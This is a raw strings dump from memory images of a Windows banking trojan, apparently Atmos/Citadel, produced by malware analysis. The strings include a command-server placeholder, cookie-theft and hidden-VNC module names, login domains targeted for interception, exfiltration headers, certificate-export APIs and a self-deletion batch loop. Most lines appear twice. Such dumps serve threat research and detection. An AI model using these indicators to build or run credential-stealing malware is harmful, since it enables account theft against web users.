hXXp://VVV.google.com/webhp
hXXp://VVV.google.com/webhp
%COMMANDSERVER%
%COMMANDSERVER%
hXXp://127.0.0.1:%u/
hXXp://127.0.0.1:%u/
X-Type: %s
X-Type: %s
_getFirefoxCookie
_getFirefoxCookie
hXXp://
hXXp://
atmos_hvnc.module
atmos_hvnc.module
atmos_ffcookie.module
atmos_ffcookie.module
atmos_video.module
atmos_video.module
userenv.dll
userenv.dll
del "%s"
del "%s"
if exist "%s" goto d
if exist "%s" goto d
del /F "%s"
del /F "%s"
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1)
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1)
urlmon.dll
urlmon.dll
cabinet.dll
cabinet.dll
hXXp://xxxxxxxx.com/xxxx/xxxx.php
hXXp://xxxxxxxx.com/xxxx/xxxx.php
%s, u %s %u u:u:u GMT
%s, u %s %u u:u:u GMT
; charset=%s
; charset=%s
HTTP/1.1 %u %s
HTTP/1.1 %u %s
Date: %s
Date: %s
Content-Length: %u
Content-Length: %u
Expires: %s
Expires: %s
Content-Type: %s%s
Content-Type: %s%s
ID: %s
ID: %s
value_%s
value_%s
value_%s_%s
value_%s_%s
%s = "%s";
%s = "%s";
*.facebook.com
*.facebook.com
*.twitter.com
*.twitter.com
*.instagram.com
*.instagram.com
*.booking.com
*.booking.com
*.sharepoint.com
*.sharepoint.com
*.yahoo.com
*.yahoo.com
login.yahoo.com
login.yahoo.com
*.google.com
*.google.com
accounts.google.com
accounts.google.com
192.168.*.*
192.168.*.*
127.0.0.1
127.0.0.1
*/wp-login.php*
*/wp-login.php*
*.xn--p1ai
*.xn--p1ai
Cookie: %s
Cookie: %s
Referer: %s
Referer: %s
Accept: %s
Accept: %s
Accept-Language: %s
Accept-Language: %s
Accept-Encoding: %s
Accept-Encoding: %s
SSSh8
SSSh8
9.tI3
9.tI3
CreatePipe
CreatePipe
GetWindowsDirectoryW
GetWindowsDirectoryW
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
RegCreateKeyW
RegCreateKeyW
RegEnumKeyW
RegEnumKeyW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegEnumKeyExW
RegEnumKeyExW
ADVAPI32.dll
ADVAPI32.dll
UrlUnescapeA
UrlUnescapeA
SHDeleteKeyW
SHDeleteKeyW
PathIsURLW
PathIsURLW
SHLWAPI.dll
SHLWAPI.dll
ShellExecuteW
ShellExecuteW
ShellExecuteExW
ShellExecuteExW
SHELL32.dll
SHELL32.dll
Secur32.dll
Secur32.dll
GDI32.dll
GDI32.dll
WS2_32.dll
WS2_32.dll
PFXImportCertStore
PFXImportCertStore
CertDeleteCertificateFromStore
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertOpenSystemStoreW
CertCloseStore
CertCloseStore
CertEnumCertificatesInStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertDuplicateCertificateContext
PFXExportCertStoreEx
PFXExportCertStoreEx
CRYPT32.dll
CRYPT32.dll
HttpSendRequestExA
HttpSendRequestExA
HttpQueryInfoA
HttpQueryInfoA
HttpSendRequestExW
HttpSendRequestExW
HttpSendRequestW
HttpSendRequestW
HttpOpenRequestA
HttpOpenRequestA
HttpOpenRequestW
HttpOpenRequestW
HttpEndRequestA
HttpEndRequestA
HttpSendRequestA
HttpSendRequestA
HttpEndRequestW
HttpEndRequestW
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
InternetCrackUrlA
InternetCrackUrlA
InternetCrackUrlW
InternetCrackUrlW
WININET.dll
WININET.dll
OLEAUT32.dll
OLEAUT32.dll
NETAPI32.dll
NETAPI32.dll
VERSION.dll
VERSION.dll
NtQueryKey
NtQueryKey
ntdll.dll
ntdll.dll
PSSSSSSh
PSSSSSSh
SSSh4
SSSh4
SUWt^Ht[Ht.Huc
SUWt^Ht[Ht.Huc
2!242:2?2[2
2!242:2?2[2
Chrome
Chrome
Firefox
Firefox
nnspr4.dll
nnspr4.dll
nss3.dll
nss3.dll
chrome.dll
chrome.dll
Process (u minute): %s
Process (u minute): %s
Input: %s
Input: %s
X-TS-Rule-Name: %s
X-TS-Rule-Name: %s
X-TS-Rule-PatternID: %u
X-TS-Rule-PatternID: %u
X-TS-BotID: %s
X-TS-BotID: %s
X-TS-Domain: %s
X-TS-Domain: %s
X-TS-SessionID: %s
X-TS-SessionID: %s
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
X-TS-Header-Cookie: %S
X-TS-Header-Cookie: %S
X-TS-Header-Referer: %S
X-TS-Header-Referer: %S
X-TS-Header-AcceptEncoding: %S
X-TS-Header-AcceptEncoding: %S
X-TS-Header-AcceptLanguage: %S
X-TS-Header-AcceptLanguage: %S
X-TS-Header-UserAgent: %S
X-TS-Header-UserAgent: %S
kernel32.dll
kernel32.dll
Global\XXX
Global\XXX
Company: %s
Company: %s
Product: %s
Product: %s
Version: %s
Version: %s
Software\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows\CurrentVersion\Uninstall
%u: %s | %s | %s
%u: %s | %s | %s
%sd1%
%sd1%
%sd2%
%sd2%
Name: %s
Name: %s
Path: %s
Path: %s
Hash: %s
Hash: %s
Time: u.u.u
Time: u.u.u
\StringFileInfo\xx\%s
\StringFileInfo\xx\%s
"%s" %s
"%s" %s
/c "%s"
/c "%s"
%sx.%s
%sx.%s
%sx
%sx
SELECT * FROM %s
SELECT * FROM %s
Rapport
Rapport
sXXXX
sXXXX
d*.swf
d*.swf
*.flv
*.flv
*.png
*.png
*.jpg
*.jpg
*.ico
*.ico
*.gif
*.gif
*.css
*.css
%Documents and Settings%\%current user%\Application Data\Uccyemuzput\odobdima.xia
%Documents and Settings%\%current user%\Application Data\Uccyemuzput\odobdima.xia
%Documents and Settings%\%current user%\Application Data\Uccyemuzput
%Documents and Settings%\%current user%\Application Data\Uccyemuzput
odobdima.xia
odobdima.xia
:\Documents and Settings\"%CurrentUserName%"\Application Data\Felaytzyymes\zaodxiibaru.ilb
:\Documents and Settings\"%CurrentUserName%"\Application Data\Felaytzyymes\zaodxiibaru.ilb
%Documents and Settings%\%current user%\Application Data\Felaytzyymes
%Documents and Settings%\%current user%\Application Data\Felaytzyymes
zaodxiibaru.ilb
zaodxiibaru.ilb
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Application Data
new.exe_3664_rwx_00400000_0000F000:
.text
.text
`.rdata
`.rdata
@.data
@.data
a%FnQU
a%FnQU
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
EnumChildWindows
EnumChildWindows
EnumWindows
EnumWindows
USER32.dll
USER32.dll
\d.nC
\d.nC
v1%ULRg
v1%ULRg
]j'
]j'
)%uj>_
)%uj>_
.io*U
.io*U
dxKeY
dxKeY
ntdll.dll
ntdll.dll
setup.dat
setup.dat
Explorer.EXE_1572_rwx_01EA0000_00047000:
.text
.text
`.data
`.data
.reloc
.reloc
update.exe
update.exe
config.bin
config.bin
%0&!%F
%0&!%F
?)500>(8
?)500>(8
7-52&
7-52&
,%)4.5(";$2
,%)4.5(";$2
:'$!71689/
:'$!71689/
-0=).?,7
-0=).?,7
60/)4:5
60/)4:5
-*?)2
-*?)2
>5;(4-2>)4 }744
>5;(4-2>)4 }744
"?5&"5%3%/
"?5&"5%3%/
398>7="'
398>7="'
;!)5:. =##
;!)5:. =##
Z#%xDVOE
Z#%xDVOE
(00(7> 59
(00(7> 59
$6>59$=1
$6>59$=1
^EXKSQN_^%X Sf
^EXKSQN_^%X Sf
PR_OpenTCPSocket
PR_OpenTCPSocket
%s%s%s
%s%s%s
gdiplus.dll
gdiplus.dll
GdiplusShutdown
GdiplusShutdown
ole32.dll
ole32.dll
gdi32.dll
gdi32.dll
?
?
value=[%s], code=[%s]
value=[%s], code=[%s]
HTTP/1.1
HTTP/1.1
HTTP/1.0
HTTP/1.0
hXXps://
hXXps://
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.1
HTTP/1.
HTTP/1.
X-WebKit-CSP
X-WebKit-CSP
hXXp://VVV.google.com/webhp
hXXp://VVV.google.com/webhp
%COMMANDSERVER%
%COMMANDSERVER%
hXXp://127.0.0.1:%u/
hXXp://127.0.0.1:%u/
X-Type: %s
X-Type: %s
_getFirefoxCookie
_getFirefoxCookie
hXXp://
hXXp://
atmos_hvnc.module
atmos_hvnc.module
atmos_ffcookie.module
atmos_ffcookie.module
atmos_video.module
atmos_video.module
userenv.dll
userenv.dll
del "%s"
del "%s"
if exist "%s" goto d
if exist "%s" goto d
del /F "%s"
del /F "%s"
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1)
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1)
urlmon.dll
urlmon.dll
cabinet.dll
cabinet.dll
hXXp://xxxxxxxx.com/xxxx/xxxx.php
hXXp://xxxxxxxx.com/xxxx/xxxx.php
%s, u %s %u u:u:u GMT
%s, u %s %u u:u:u GMT
; charset=%s
; charset=%s
HTTP/1.1 %u %s
HTTP/1.1 %u %s
Date: %s
Date: %s
Content-Length: %u
Content-Length: %u
Expires: %s
Expires: %s
Content-Type: %s%s
Content-Type: %s%s
ID: %s
ID: %s
value_%s
value_%s
value_%s_%s
value_%s_%s
%s = "%s";
%s = "%s";
*.facebook.com
*.facebook.com
*.twitter.com
*.twitter.com
*.instagram.com
*.instagram.com
*.booking.com
*.booking.com
*.sharepoint.com
*.sharepoint.com
*.yahoo.com
*.yahoo.com
login.yahoo.com
login.yahoo.com
*.google.com
*.google.com
accounts.google.com
accounts.google.com
192.168.*.*
192.168.*.*
127.0.0.1
127.0.0.1
*/wp-login.php*
*/wp-login.php*
*.xn--p1ai
*.xn--p1ai
Cookie: %s
Cookie: %s
Referer: %s
Referer: %s
Accept: %s
Accept: %s
Accept-Language: %s
Accept-Language: %s
Accept-Encoding: %s
Accept-Encoding: %s
SSSh8
SSSh8
9.tI3
9.tI3
CreatePipe
CreatePipe
GetWindowsDirectoryW
GetWindowsDirectoryW
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
RegCreateKeyW
RegCreateKeyW
RegEnumKeyW
RegEnumKeyW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegEnumKeyExW
RegEnumKeyExW
ADVAPI32.dll
ADVAPI32.dll
UrlUnescapeA
UrlUnescapeA
SHDeleteKeyW
SHDeleteKeyW
PathIsURLW
PathIsURLW
SHLWAPI.dll
SHLWAPI.dll
ShellExecuteW
ShellExecuteW
ShellExecuteExW
ShellExecuteExW
SHELL32.dll
SHELL32.dll
Secur32.dll
Secur32.dll
GDI32.dll
GDI32.dll
WS2_32.dll
WS2_32.dll
PFXImportCertStore
PFXImportCertStore
CertDeleteCertificateFromStore
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertOpenSystemStoreW
CertCloseStore
CertCloseStore
CertEnumCertificatesInStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertDuplicateCertificateContext
PFXExportCertStoreEx
PFXExportCertStoreEx
CRYPT32.dll
CRYPT32.dll
HttpSendRequestExA
HttpSendRequestExA
HttpQueryInfoA
HttpQueryInfoA
HttpSendRequestExW
HttpSendRequestExW
HttpSendRequestW
HttpSendRequestW
HttpOpenRequestA
HttpOpenRequestA
HttpOpenRequestW
HttpOpenRequestW
HttpEndRequestA
HttpEndRequestA
HttpSendRequestA
HttpSendRequestA
HttpEndRequestW
HttpEndRequestW
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
InternetCrackUrlA
InternetCrackUrlA
InternetCrackUrlW
InternetCrackUrlW
WININET.dll
WININET.dll
OLEAUT32.dll
OLEAUT32.dll
NETAPI32.dll
NETAPI32.dll
VERSION.dll
VERSION.dll
NtQueryKey
NtQueryKey
ntdll.dll
ntdll.dll
PSSSSSSh
PSSSSSSh
SSSh4
SSSh4
SUWt^Ht[Ht.Huc
SUWt^Ht[Ht.Huc
2!242:2?2[2
2!242:2?2[2
Chrome
Chrome
Firefox
Firefox
nnspr4.dll
nnspr4.dll
nss3.dll
nss3.dll
chrome.dll
chrome.dll
Process (u minute): %s
Process (u minute): %s
Input: %s
Input: %s
X-TS-Rule-Name: %s
X-TS-Rule-Name: %s
X-TS-Rule-PatternID: %u
X-TS-Rule-PatternID: %u
X-TS-BotID: %s
X-TS-BotID: %s
X-TS-Domain: %s
X-TS-Domain: %s
X-TS-SessionID: %s
X-TS-SessionID: %s
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
X-TS-Header-Cookie: %S
X-TS-Header-Cookie: %S
X-TS-Header-Referer: %S
X-TS-Header-Referer: %S
X-TS-Header-AcceptEncoding: %S
X-TS-Header-AcceptEncoding: %S
X-TS-Header-AcceptLanguage: %S
X-TS-Header-AcceptLanguage: %S
X-TS-Header-UserAgent: %S
X-TS-Header-UserAgent: %S
kernel32.dll
kernel32.dll
Global\XXX
Global\XXX
Company: %s
Company: %s
Product: %s
Product: %s
Version: %s
Version: %s
Software\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows\CurrentVersion\Uninstall
%u: %s | %s | %s
%u: %s | %s | %s
%sd1%
%sd1%
%sd2%
%sd2%
Name: %s
Name: %s
Path: %s
Path: %s
Hash: %s
Hash: %s
Time: u.u.u
Time: u.u.u
\StringFileInfo\xx\%s
\StringFileInfo\xx\%s
"%s" %s
"%s" %s
/c "%s"
/c "%s"
%sx.%s
%sx.%s
%sx
%sx
SELECT * FROM %s
SELECT * FROM %s
Rapport
Rapport
sXXXX
sXXXX
d*.swf
d*.swf
*.flv
*.flv
*.png
*.png
*.jpg
*.jpg
*.ico
*.ico
*.gif
*.gif
*.css
*.css
%Documents and Settings%\%current user%\Application Data\Uccyemuzput\odobdima.xia
%Documents and Settings%\%current user%\Application Data\Uccyemuzput\odobdima.xia
%Documents and Settings%\%current user%\Application Data\Uccyemuzput
%Documents and Settings%\%current user%\Application Data\Uccyemuzput
odobdima.xia
odobdima.xia
%Documents and Settings%\%current user%\Application Data\Felaytzyymes\zaodxiibaru.ilb
%Documents and Settings%\%current user%\Application Data\Felaytzyymes\zaodxiibaru.ilb
%Documents and Settings%\%current user%\Application Data\Felaytzyymes
%Documents and Settings%\%current user%\Application Data\Felaytzyymes
zaodxiibaru.ilb
zaodxiibaru.ilb
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Application Data